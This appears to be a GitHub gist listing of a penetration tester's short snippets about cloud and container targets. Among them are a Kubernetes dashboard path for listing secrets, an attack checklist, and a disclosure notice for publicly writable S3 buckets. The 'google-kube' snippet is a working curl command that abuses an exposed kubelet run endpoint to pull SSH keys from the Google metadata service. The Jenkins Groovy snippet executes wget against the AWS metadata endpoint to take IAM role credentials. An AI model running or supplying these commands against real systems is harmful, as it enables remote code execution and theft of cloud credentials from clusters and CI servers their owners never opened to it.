
View censys.md
POST /api/v1/search/ipv4 HTTP/1.1
Host: censys.io
Authorization: Basic A
User-Agent: curl/7.52.1
Accept: */*
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 128
View Kube-API.MD

List the default namespace

/api/v1/overview/default?filterBy=&itemsPerPage=10&name=&page=1&sortBy=d,creationTimestamp

List secrets in the default namespace

/api/v1/secret/default?filterBy=&itemsPerPage=10&name=&page=1&sortBy=d,creationTimestamp
View filter.py
import os
import fnmatch
import re
import shutil

# Directory holding the collected kube config files to filter (author's local path)
folder = "/home/host/MyBinaryEdge/kube/cfg/"
View attack list.txt
1) Can it scan for production systems?
2) Can you access the Docker registry?
3) Can you push an image to the registry?
4) Grab IAM / token from metadata
5) Check access levels
View btsportepg.py
import requests
session = requests.Session()
headers = {"Origin":"https://sport.bt.com","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0","Referer":"https://sport.bt.com/","Connection":"close","If-Modified-Since":"Mon, 22 Oct 2018 14:55:02 GMT","Accept-Language":"en-GB,en;q=0.5","Accept-Encoding":"gzip, deflate"}
response = session.get("https://epg.cdn.vision.bt.com/JSON/all", headers=headers)
print("Status code: %i" % response.status_code)
print("Response body: %s" % response.content)
View timeout.go
package main

import (
	"context"
	"crypto/tls"
	"log"
	"net/http"
	"time"
)
View firebase.txt
View google-kube.md

Retrieve public SSH keys from the Google metadata service

Request

curl -sk https://IP:10250/run/NAMESPACE/POD/CONTAINERNAME -d "busybox wget -q -O - --header='Metadata-Flavor: Google' http://metadata/computeMetadata/v1/project/attributes/ssh-keys?alt=json"
View jenkins.md

Jenkins Groovy RCE Commands

AWS IAM role keys

def command = "wget -q -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/"
def proc = command.execute()
View s3-pwn.md

If you are reading this, there is a chance you have a poc.txt in your S3 bucket.

This is just a little heads-up: attackers can upload and overwrite files in your S3 bucket, and if you serve files such as JavaScript from it, they can add XSS or a Coinhive miner to your JS.

If you log in to your AWS console, find the bucket and remove the public-write permission from it; this will fix the issue.

How to test an S3 bucket for bad permissions